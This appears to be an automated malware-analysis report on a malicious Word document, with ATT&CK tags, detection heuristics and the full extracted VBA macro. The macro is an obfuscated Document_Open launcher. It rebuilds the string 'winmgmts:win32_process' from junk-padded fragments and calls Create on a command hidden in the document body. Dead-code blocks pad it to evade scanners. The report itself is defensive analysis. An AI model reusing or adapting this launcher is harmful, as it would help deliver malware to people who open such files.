MALICIOUS
Risk Score: 112

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros, specifically a Document_Open macro that uses CreateObject, indicating malicious intent. The script attempts to read from various file paths, suggesting it may be trying to locate or prepare for a second-stage payload. The obfuscated nature of the script and the multiple file paths accessed point towards a downloader or dropper functionality.
Heuristics (6)

- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code.
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: Set Txqfipc8707 = CreateObject(I_578_ki05d2e3f96d)
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro [low] (OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8251 bytes |

SHA-256: 2ed55976d9425aa6a002473bb1c71eee8e80dcaff763b47a487ebd8b695e1425

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 121 of 199 identifiers look randomly generated (e.g. 'Nx30bnb806i2wqjysh'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Hip47dt3gxa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_open()
    Iwvbojo43fjdofbng
End Sub

Attribute VB_Name = "Y7gwqi1ive42"

Attribute VB_Name = "Jvyc596mf28sbcz"

Function Iwvbojo43fjdofbng()
    On Error Resume Next
    mKbjhqs = Hip47dt3gxa.StoryRanges.Item(244 / 244)
    GoTo WWiLBINGI
    Dim BgHReIFHE() As Byte
    Dim TkMYHIWIo As Integer
    TkMYHIWIo = FreeFile
    Open "F:\PQopA\vyPhIFLA\jQdqcDI.yfzCJR" For Binary Access Read As #TkMYHIWIo
    Open "O:\CLiLqZ\aNBcfJE\PuhnB.MPpLCeE" For Binary Access Read As #TkMYHIWIo
    ReDim BgHReIFHE(1 To LOF(intGend) - 5)
    Get #TkMYHIWIo, , BgHReIFHE
    Get #TkMYHIWIo, , BgHReIFHE
    Get #TkMYHIWIo, , BgHReIFHE
    Close #TkMYHIWIo
WWiLBINGI:
    snahbsd = "]b2[sp]b2[s"
    Vdrq3bj0ngj = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
    GoTo LxtEdi
    Dim zxRaGGeIJ() As Byte
    Dim bgJaCWcA As Integer
    bgJaCWcA = FreeFile
    Open "F:\MxhyduCFg\LkAJHiFgy\UiRfC.PsWrEFRDE" For Binary Access Read As #bgJaCWcA
    Open "O:\MIKTtF\CJTXFAB\MMKRj.mmHqH" For Binary Access Read As #bgJaCWcA
    ReDim zxRaGGeIJ(1 To LOF(intGend) - 5)
    Get #bgJaCWcA, , zxRaGGeIJ
    Get #bgJaCWcA, , zxRaGGeIJ
    Get #bgJaCWcA, , zxRaGGeIJ
    Close #bgJaCWcA
LxtEdi:
    Qhuu_lgubvl9cv_ = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
    GoTo XmbbBEHV
    Dim hzBtJ() As Byte
    Dim FOQjEJa As Integer
    FOQjEJa = FreeFile
    Open "F:\iuZAaFJH\PoFzEVDk\oSyCT.RpJkBBCIh" For Binary Access Read As #FOQjEJa
    Open "O:\qfSRYA\wDKjFJ\qjZes.BCQmse" For Binary Access Read As #FOQjEJa
    ReDim hzBtJ(1 To LOF(intGend) - 5)
    Get #FOQjEJa, , hzBtJ
    Get #FOQjEJa, , hzBtJ
    Get #FOQjEJa, , hzBtJ
    Close #FOQjEJa
XmbbBEHV:
    D4o34irfndkjlgj5g = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
    GoTo ACFwrGBJG
    Dim nSovkijEy() As Byte
    Dim VMdvQT As Integer
    VMdvQT = FreeFile
    Open "F:\imwbE\aiRUDGE\BZNXMHFJ.kgudJWk" For Binary Access Read As #VMdvQT
    Open "O:\rDByLK\zyAEB\DnzbEI.PxLCucEz" For Binary Access Read As #VMdvQT
    ReDim nSovkijEy(1 To LOF(intGend) - 5)
    Get #VMdvQT, , nSovkijEy
    Get #VMdvQT, , nSovkijEy
    Get #VMdvQT, , nSovkijEy
    Close #VMdvQT
ACFwrGBJG:
    Deyom47coza = "]b2[ss]b2[s"
    GoTo ouaADA
    Dim UCPDF() As Byte
    Dim BZWmAO As Integer
    BZWmAO = FreeFile
    Open "F:\gkKqIFBOi\GyNYEG\RyvQIA.zEMDEDH" For Binary Access Read As #BZWmAO
    Open "O:\EomQIDCW\LVNyf\EjlRvHEs.qNDKf" For Binary Access Read As #BZWmAO
    ReDim UCPDF(1 To LOF(intGend) - 5)
    Get #BZWmAO, , UCPDF
    Get #BZWmAO, , UCPDF
    Get #BZWmAO, , UCPDF
    Close #BZWmAO
ouaADA:
    Fl4xbbija5u2 = D4o34irfndkjlgj5g + Deyom47coza + Qhuu_lgubvl9cv_ + snahbsd + Vdrq3bj0ngj
    GoTo xAdza
    Dim ndWQBD() As Byte
    Dim hJgZLCI As Integer
    hJgZLCI = FreeFile
    Open "F:\iUSjtD\HSzSqJGC\NoWlTmFB.iMMoBJ" For Binary Access Read As #hJgZLCI
    Open "O:\qoezR\GjzkD\txoSFK.iUjII" For Binary Access Read As #hJgZLCI
    ReDim ndWQBD(1 To LOF(intGend) - 5)
    Get #hJgZLCI, , ndWQBD
    Get #hJgZLCI, , ndWQBD
    Get #hJgZLCI, , ndWQBD
    Close #hJgZLCI
xAdza:
    I_578_ki05d2e3f96d = Dhbu3zc6xkne5(Fl4xbbija5u2)
    GoTo QZTNh
    Dim lKBZBBG() As Byte
    Dim FjllU As Integer
    FjllU = FreeFile
    Open "F:\gjZtkB\PFHNFRFB\XjTTIsg.JdTCqc" For Binary Access Read As #FjllU
    Open "O:\nbrwo\NVVHWbIi\jFvmc.NyyqEC" For Binary Access Read As #FjllU
    ReDim lKBZBBG(1 To LOF(intGend) - 5)
    Get #FjllU, , lKBZBBG
    Get #FjllU, , lKBZBBG
    Get #FjllU, , lKBZBBG
    Close #FjllU
QZTNh:
    Set Txqfipc8707 = CreateObject(I_578_ki05d2e3f96d)
    GoTo IyiAG
    Dim AVtwwQCJ() As Byte
    Dim GCKRDI As Integer
    GCKRDI = FreeFile
    Open "F:\fQNFJR\pFqHAdq\DpgGJGZlB.txwNkfsJ" For Binary Access Read As #GCKRDI
    Open "O:\zHWdBB\fUyeO\LpSSAACdB.fARtKGIFy" For Binary Access Read As #GCKRDI
    ReDim AVtwwQCJ(1 To LOF(intGend) - 5)
    Get #GCKRDI, , AVtwwQCJ
    Get #GCKRDI, , AVtwwQCJ
    Get #GCKRDI, , AVtwwQCJ
    Close #GCKRDI
IyiAG:
    Xpw_e561ju5cvjg8 = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
    GoTo JjNsJH
    Dim RbJcE() As Byte
    Dim rMESxwQFT As Integer
    rMESxwQFT = FreeFile
    Open "F:\hnFAzJBK\zlXjFd\ovMWyI.DciiII" For Binary Access Read As #rMESxwQFT
    Open "O:\eKMoG\vEZZF\WQowEI.oDZwWIj" For Binary Access Read As #rMESxwQFT
    ReDim RbJcE(1 To LOF(intGend) - 5)
    Get #rMESxwQFT, , RbJcE
    Get #rMESxwQFT, , RbJcE
    Get #rMESxwQFT, , RbJcE
    Close #rMESxwQFT
JjNsJH:
    GoTo ddXwC
    Dim EzFFeHoJf() As Byte
    Dim XbDswJGc As Integer
    XbDswJGc = FreeFile
    Open "F:\hfvIQG\MXYlH\mLKwc.PJaQwBLH" For Binary Access Read As #XbDswJGc
    Open "O:\RoyRgJhB\GBSIY\JnjkD.JVDSJIISA" For Binary Access Read As #XbDswJGc
    ReDim EzFFeHoJf(1 To LOF(intGend) - 5)
    Get #XbDswJGc, , EzFFeHoJf
    Get #XbDswJGc, , EzFFeHoJf
    Get #XbDswJGc, , EzFFeHoJf
    Close #XbDswJGc
ddXwC:
    Txqfipc8707.Create Dhbu3zc6xkne5(Xpw_e561ju5cvjg8), Oibet7wg7wyp, Cjeynptdc002
    GoTo eHcnH
    Dim saCVs() As Byte
    Dim FoSgAHxEI As Integer
    FoSgAHxEI = FreeFile
    Open "F:\iKCJD\sxqjGtGAA\RueypE.KSvTdBAP" For Binary Access Read As #FoSgAHxEI
    Open "O:\fUyDa\axbkGz\EqLKFI.QUNSQAfk" For Binary Access Read As #FoSgAHxEI
    ReDim saCVs(1 To LOF(intGend) - 5)
    Get #FoSgAHxEI, , saCVs
    Get #FoSgAHxEI, , saCVs
    Get #FoSgAHxEI, , saCVs
    Close #FoSgAHxEI
eHcnH:
    GoTo MclYG
    Dim uJXDA() As Byte
    Dim RahfCYd As Integer
    RahfCYd = FreeFile
    Open "F:\HqnmFC\EEKWiK\TpdeIzb.TQxCDiChf" For Binary Access Read As #RahfCYd
    Open "O:\KoZkV\qXwNIWE\hErpgJqE.zMxYhGl" For Binary Access Read As #RahfCYd
    ReDim uJXDA(1 To LOF(intGend) - 5)
    Get #RahfCYd, , uJXDA
    Get #RahfCYd, , uJXDA
    Get #RahfCYd, , uJXDA
    Close #RahfCYd
MclYG:
End Function

Function Dhbu3zc6xkne5(A5u9wep0d3qelxmu)
    On Error Resume Next
    GoTo MbfoL
    Dim zaULB() As Byte
    Dim nJnfi As Integer
    nJnfi = FreeFile
    Open "F:\swUecQL\psFGcr\QCbmfo.zBIdJFDJ" For Binary Access Read As #nJnfi
    Open "O:\EjsoDG\RztRJEH\jrRhABGA.nYTFGCH" For Binary Access Read As #nJnfi
    ReDim zaULB(1 To LOF(intGend) - 5)
    Get #nJnfi, , zaULB
    Get #nJnfi, , zaULB
    Get #nJnfi, , zaULB
    Close #nJnfi
MbfoL:
    Vm1r_lzkqy40vls = (A5u9wep0d3qelxmu)
    GoTo dWuSsrA
    Dim pKRBJFGGG() As Byte
    Dim ZWojIFH As Integer
    ZWojIFH = FreeFile
    Open "F:\jYJmuPu\sBktDAn\QVaTDHGxG.ZEfGSDG" For Binary Access Read As #ZWojIFH
    Open "O:\ADBKPBuE\NMFmIGClH\feOQAuyI.rjrTJyHaY" For Binary Access Read As #ZWojIFH
    ReDim pKRBJFGGG(1 To LOF(intGend) - 5)
    Get #ZWojIFH, , pKRBJFGGG
    Get #ZWojIFH, , pKRBJFGGG
    Get #ZWojIFH, , pKRBJFGGG
    Close #ZWojIFH
dWuSsrA:
    Obya1ffmrx97q3nn9c = Yl4i2j6kjo6t6mf(Vm1r_lzkqy40vls)
    GoTo EqwNuBT
    Dim cloXuAN() As Byte
    Dim YgXdF As Integer
    YgXdF = FreeFile
    Open "F:\LrUUEQpH\LlDELII\rwDmDFED.ScPUFGgRs" For Binary Access Read As #YgXdF
    Open "O:\Iwvue\YtorDjHGw\tsCevxcs.nJmucACdC" For Binary Access Read As #YgXdF
    ReDim cloXuAN(1 To LOF(intGend) - 5)
    Get #YgXdF, , cloXuAN
    Get #YgXdF, , cloXuAN
    Get #YgXdF, , cloXuAN
    Close #YgXdF
EqwNuBT:
    Dhbu3zc6xkne5 = Obya1ffmrx97q3nn9c
    GoTo aeFdVDUC
    Dim PdDIAD() As Byte
    Dim MzgADhWH As Integer
    MzgADhWH = FreeFile
    Open "F:\nVXTjCCZH\GnXgG\OqNCAGH.gooJyCB" For Binary Access Read As #MzgADhWH
    Open "O:\rTYDHXA\GPZDnsA\cUGTmBB.ybsfCmF" For Binary Access Read As #MzgADhWH
    ReDim PdDIAD(1 To LOF(intGend) - 5)
    Get #MzgADhWH, , PdDIAD
    Get #MzgADhWH, , PdDIAD
    Get #MzgADhWH, , PdDIAD
    Close #MzgADhWH
aeFdVDUC:
End Function

Function Yl4i2j6kjo6t6mf(Dvmzdqwpdj3yna_bwu)
    E9wioco0r714hpi7v = Rx2xqust6ey2
    GoTo ynTwPIHK
    Dim iIbcDSBJ() As Byte
    Dim UGaOfE As Integer
    UGaOfE = FreeFile
    Open "F:\TbFWCHC\vGFac\seMiJIFE.GNOoBGaI" For Binary Access Read As #UGaOfE
    Open "O:\JaeDsgGQH\jsQshJ\GIgkBKXQI.NucQgT" For Binary Access Read As #UGaOfE
    ReDim iIbcDSBJ(1 To LOF(intGend) - 5)
    Get #UGaOfE, , iIbcDSBJ
    Get #UGaOfE, , iIbcDSBJ
    Get #UGaOfE, , iIbcDSBJ
    Close #UGaOfE
ynTwPIHK:
    Yl4i2j6kjo6t6mf = Replace(Dvmzdqwpdj3yna_bwu, "]b2[s", Nx30bnb806i2wqjysh)
    GoTo zqMwFKFj
    Dim tBhtyAc() As Byte
    Dim tgEIDnGWC As Integer
    tgEIDnGWC = FreeFile
    Open "F:\TyJRSE\afIiUO\mTOSw.BzErvOX" For Binary Access Read As #tgEIDnGWC
    Open "O:\eUmFqDC\yUBjl\LXFEN.BkINEo" For Binary Access Read As #tgEIDnGWC
    ReDim tBhtyAc(1 To LOF(intGend) - 5)
    Get #tgEIDnGWC, , tBhtyAc
    Get #tgEIDnGWC, , tBhtyAc
    Get #tgEIDnGWC, , tBhtyAc
    Close #tgEIDnGWC
zqMwFKFj:
End Function